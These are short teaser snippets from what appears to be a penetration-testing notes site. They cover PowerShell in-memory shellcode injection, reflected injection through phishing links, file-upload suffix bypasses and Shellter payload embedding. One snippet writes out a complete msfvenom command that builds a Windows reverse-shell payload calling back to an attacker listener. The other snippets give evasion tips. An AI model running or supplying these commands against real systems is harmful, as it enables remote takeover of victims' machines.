• Short sum­ma­ry of techniques: Example of a manual In-memory injection Cre­ate a reverse shell pay­load for PowerShell: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.211 LPORT=443 -f powershell -v sc Use this Pow­er­Shell script, which injects the shell­code into the own (Pow­er­Shell) process and exe­cutes it in a new thread: Start a lis­ten­er and exe­cute it in the vic­tim’s…

  • Short: A user opens a link (e.g. from a phish­ing email) which has a injec­tion in the URL which is then exe­cut­ed on the site as long as the user is logged in. See also com­mand injec­tions post. Class­es: Tip:

  • File upload checklist

    (!) If upload does not seem to work, change the suf­fix e.g. from .php to .pHp. More: File uploads / images

  • Shell­ter kann add a reverse shell pay­load into a exe file.